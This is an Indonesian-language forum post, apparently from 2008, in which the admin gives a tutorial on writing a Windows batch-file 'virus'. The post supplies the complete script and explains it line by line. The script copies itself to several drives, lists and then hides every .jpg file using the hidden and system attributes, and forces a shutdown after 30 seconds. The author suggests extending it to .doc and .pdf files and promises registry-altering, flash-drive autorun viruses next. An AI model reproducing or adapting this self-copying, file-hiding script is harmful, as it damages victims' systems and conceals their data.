Forum For Exclusive Community


    yang suka maen2 ama virus

    Share
    avatar
    Asimo
    Admin
    Admin

    Male Number of posts : 9
    Age : 27
    Location : Jakarta
    Job/hobbies : Admin
    Registration date : 2008-12-15

    yang suka maen2 ama virus

    Post  Asimo on Thu Dec 25, 2008 10:57 pm

    Halow teman2..hehehe

    G buat topik baru nih menganai cara membuat virus..hehehe.. g bukannya bermaksud untuk ngajarin loh tapi cuman saling membagi pengalaman sama pengetahuan aja^^

    Sebenarnya sih banyak cara yang bisa digunakan untuk membuat suatu virus yang mematikan, hmm..cuman bermodalkan logika yang baik dan sedikit menguasai bahasa pemograman aja udh bisa buat virus loh...hehehe...

    tapi disini g mo bahas pembuatan virus dalam bentuk batch file, knapa gw pilih batch file..karena ini yang paling gampang dipelajari, hmm..bisa di katakan paling dasar lah..hehehe..Nanti klo dah jago sih bisa buat Trojan dari Vb..hehehe

    G mulai aja ya^^

    Virus I
    kriteria virus yg gw buat ini terdiri dari :
    1. Ketika virus di jalanin, virus bakal ngopy dirinya ke smua drive dari A,C,D,E dan F
    2. Selanjutnya virus bakal mengecek smua file dengan ekstensi *.jpg yang ada di semua drive
    3. File-file berekstensi *.jpg tersebut yang di ketemukan virus akan dirubah atribut nya ke dalam mode supper hidden

    Mulai membuat :
    Buka notepad nya dulu lewat Run

    trus ketik perintah d bawah ini

    Echo off > C:\data.txt
    for %%p in (A C D E F) do copy %0 %%p:
    for %%q in (A C D E F) do dir %%q:\*.jpg /B /S >> C:\data.txt
    for %%r in (A B C D E F) do attrib +h +s %%r:\*.jpg /s
    shutdown -s -f -t 30
    exit

    Penjelasan :

    algoritma 1 >> for %%p in (A C D E F) do copy %0 %%p:
    gw make perulangan jadi lebih efektif, sebenernya sih bisa aja pke copy doang cuman harus nulis 5 baris...heheheh
    jadi %%p itu menunjukan variabel di dalem virus....waktu virus ini jalan variabel p nya itu bakal di copy ke smua drive

    algoritma 2 >> for %%q in (A C D E F) do dir %%q:\*.jpg /B /S >> C:\data.txt
    masih pke for juga buat perulangan....[dir] disini merupakan perintah untuk melakukan pengecekan pada direktori di semua drive yang berformat *.jpg...../B disini untuk ngilangin tampilan header waktu perintah dir di jalanin...../S dipake supaya pencarian file sampai ke subdirektori.....

    algoritma 3 >> for %%r in (A B C D E F) do attrib +h +s %%r:\*.jpg /S
    sama juga masih pke perulangan untuk melakukan penyembunyian file2 dengan ekstensi *.jpg..klo mao sembunyiin yg lain misal : file ekstensi *.doc , *.pdf , *.bmp dll...tinggal ganti aja tuh ato nggak d tambahin sendiri..heheheh...
    nah attrib +h +s untuk membuat file ekstensi *.jpg itu status nya menjadi hidden^^

    algoritma 4 >> Shutdown -s -f -t 30
    ini perintah untuk melakukan shutdown komputer
    -s perintah untuk shutdown
    -f perintah untuk menutup secara paksa smua aplikasi yang masih jalan
    -t 30 memberikan waktu 30 detik sebelum di shutdown...klo mao isi 1 juga bisa..hehehehhe....

    Klo udh program ini di save dalam ekstensi *.bat.....cara ngetes virus nya jalan ato nggak klik aja file yang berekstensi bat tadi...wkwkwk... oh y prlu g ksh tau bgi yg mencoba virus ini, resiko ditanggung sndiri y, soalna g gk tau cara ngatasin y^^

    Tunggu Virus2 selanjutnya ya....kpn2 kita buat virus yang bisa ngacak2 registry windows yang bisa autorun dari flashdisk..

    Klo yang punya pengetahuan ato pengalaman buat virus bagi2 ya... posting aja di sini^^

      Current date/time is Tue Sep 19, 2017 8:33 pm